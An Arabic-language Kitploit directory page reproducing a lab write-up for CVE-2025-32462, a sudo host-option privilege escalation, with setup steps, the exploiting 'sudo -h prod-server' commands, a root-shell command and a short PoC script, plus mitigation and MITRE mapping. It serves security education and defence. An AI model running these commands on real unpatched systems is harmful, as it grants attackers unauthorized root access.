Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32462- — CVE-2025-32462 هي ثغرة تصعيد صلاحيات محلية في sudo. | Kitploit
أدوات/GitHubGitHub/offsecplaybook/cve-2025-32462-
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHuboffsecplaybook/cve-2025-32462-

CVE-2025-32462-

CVE-2025-32462 هي ثغرة تصعيد صلاحيات محلية في sudo.

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32462 – تجاوز اسم المضيف في Sudo لتصعيد الامتيازات

CVE Cyber Security Penetration Testing Security Research

فهرس المحتويات

  1. نظرة عامة
  2. تفاصيل الثغرة
  3. الأثر
  4. بيئة المختبر
  5. التحقق من الإصدار المتأثر
  6. تكوين المستخدم وسياسات sudoers
  7. شرح الاستغلال خطوة بخطوة
  8. ملخص إثبات المفهوم
  9. لماذا نظام Ubuntu غير عرضة للثغرة
  10. التخفيف
  11. الربط مع MITRE ATT&CK
  12. المراجع
  13. إخلاء المسؤولية

نظرة عامة

CVE-2025-32462 هي ثغرة تصعيد امتيازات محلية في sudo تتيح لمستخدم منخفض الامتيازات تنفيذ أوامر بصلاحيات الجذر (root) عبر استغلال قواعد sudo المقيدة باسم المضيف. تكمن المشكلة في الطريقة التي تعامل بها sudo تاريخيًا مع خيار -h (المضيف) أثناء فحوصات الترخيص.

عندما تكون قاعدة sudoers مقيدة باسم مضيف محدد، يجب أن يسمح sudo بالتنفيذ فقط عندما يتطابق اسم مضيف النظام مع القاعدة. وبسبب منطق معيب، وثقت الإصدارات المتأثرة بـاسم مضيف يقدمه المستخدم عبر sudo -h، مما سمح للمهاجمين بتجاوز القيد بالكامل.


تفاصيل الثغرة

  • معرف CVE: CVE-2025-32462
  • النوع: تصعيد امتيازات محلي
  • المكوّن المتأثر: sudo
  • ناقل الهجوم: محلي
  • الامتيازات المطلوبة: منخفضة (مستخدم غير sudo)
  • تفاعل المستخدم: لا شيء

السبب الجذري

سمح sudo للوسيط -h <hostname> بالتأثير على قرارات الترخيص. في الإصدارات المتأثرة، كان اسم المضيف المقدَّم محل ثقة أثناء تقييم قاعدة sudoers، بدلاً من التحقق منه بدقة مقابل اسم المضيف الحقيقي للنظام.

ونتيجة لذلك، يمكن تجاوز قيود sudo القائمة على اسم المضيف.


الأثر

إذا تم استغلالها بنجاح، يمكن لمهاجم محلي أن:

  • ينفّذ أوامر عشوائية بصلاحيات الجذر (root)
  • يخترق النظام بالكامل
  • يتجاوز الحدود الأمنية الإدارية

في البيئات الواقعية، تُعد هذه الثغرة خطيرة بشكل خاص في:

  • الأنظمة متعددة المستخدمين
  • البيئات المحصّنة التي تستخدم قواعد sudo خاصة باسم المضيف
  • مضيفات Bastion أو مضيفات القفز (jump hosts)

بيئة المختبر

المكوّنالتفاصيل
نظام التشغيلDebian 11 (Bullseye – غير مصحّح)
إصدار sudo≤ 1.9.13
مستوى الوصولمستخدم محلي
المحاكاة الافتراضيةVirtualBox

⚠️ ملاحظة: تتضمن إصدارات Ubuntu وDebian الحديثة تصحيحات معاد نقلها (backported) مع الاحتفاظ بسلاسل إصدارات مماثلة. لا يمكن إعادة إنتاج هذه الثغرة على الأنظمة المصححة.


الخطوة 1 – التحقق من إصدار sudo المتأثر

root@kitploit:~
sudo --version

المتوقع (الإصدار المتأثر):

root@kitploit:~
Sudo version 1.9.5p2

الخطوة 2 – إنشاء مستخدم منخفض الامتيازات

root@kitploit:~
sudo useradd -m attacker
sudo passwd attacker
groups attacker

المتوقع:

root@kitploit:~
attacker : attacker

يجب ألا ينتمي المستخدم إلى مجموعة sudo.


الخطوة 3 – تكوين قاعدة sudoers متأثرة

حرّر إعدادات sudoers بأمان:

root@kitploit:~
sudo visudo

أضف السطر التالي:

root@kitploit:~
attacker prod-server = (root) ALL
  • prod-server هو اسم مضيف وهمي
  • يجب أن يكون اسم مضيف النظام الحقيقي مختلفًا

تحقق:

root@kitploit:~
sudo -l -U attacker

المتوقع:

root@kitploit:~
User attacker may run the following commands on prod-server:
    (root) ALL

الخطوة 4 – تأكيد رفض sudo الاعتيادي

بدّل المستخدم:

root@kitploit:~
su - attacker

حاول استخدام sudo بشكل اعتيادي:

root@kitploit:~
sudo id

المتوقع:

root@kitploit:~
attacker is not allowed to run sudo on <hostname>

الخطوة 5 – الاستغلال (CVE-2025-32462)

شغّل الثغرة:

root@kitploit:~
sudo -h prod-server id

مخرجات الاستغلال الناجح:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root)

افتح قشرة (shell) بصلاحيات root:

root@kitploit:~
sudo -h prod-server /bin/bash

تحقق:

root@kitploit:~
id

ملخص إثبات المفهوم

سكربت إثبات المفهوم الآلي (اختياري)

root@kitploit:~
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id

احفظ الملف باسم exploit.sh، واجعله قابلاً للتنفيذ، ثم شغّله كمستخدم attacker:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh
الإجراءالنتيجة
sudo اعتيادي❌ مرفوض
sudo -h prod-server id✅ صلاحيات root

يؤكد هذا نجاح عملية تصعيد الامتيازات.


لماذا نظام Ubuntu غير عرضة للثغرة

تبدو إصدارات Ubuntu الحديثة وكأنها تأتي بإصدارات من sudo تقع ضمن النطاق المتأثر. غير أن Ubuntu قامت بإعادة نقل التصحيح الأمني (backport) الخاص بـ CVE‑2025‑32462 دون تغيير سلسلة الإصدار الأصلية.

ونتيجة لذلك:

  • لم يعد خيار sudo -h يؤثر في فحوصات الترخيص
  • يتم رفض انتحال اسم المضيف بشكل صحيح
  • لا يمكن إعادة إنتاج الثغرة على الرغم من تشابه أرقام الإصدارات

يُبرز هذا أهمية التحقق من حالة الثغرة باستخدام الاختبار السلوكي، وليس سلاسل الإصدارات وحدها.


التخفيف

  • قم بترقية sudo إلى إصدار مصحّح
  • أزل قواعد sudo المقيدة باسم المضيف حيثما أمكن
  • راقب محاولات تصعيد الامتيازات المحلية

الربط مع MITRE ATT&CK

  • TA0004 – تصعيد الامتيازات
  • T1548.003 – إساءة استخدام آلية التحكم في رفع الصلاحيات (sudo)

المراجع

  • نشرة الأمان الخاصة بـ CVE‑2025‑32462
  • إعلانات الأمان الخاصة بمشروع sudo
  • متتبّع أمان Debian

إخلاء المسؤولية

هذا الشرح لأغراض البحث الأمني التعليمي والدفاعي فقط. لا تختبر هذه الثغرة على أنظمة لا تملكها أو ليس لديك إذن صريح بتقييمها.

تنزيل الأداة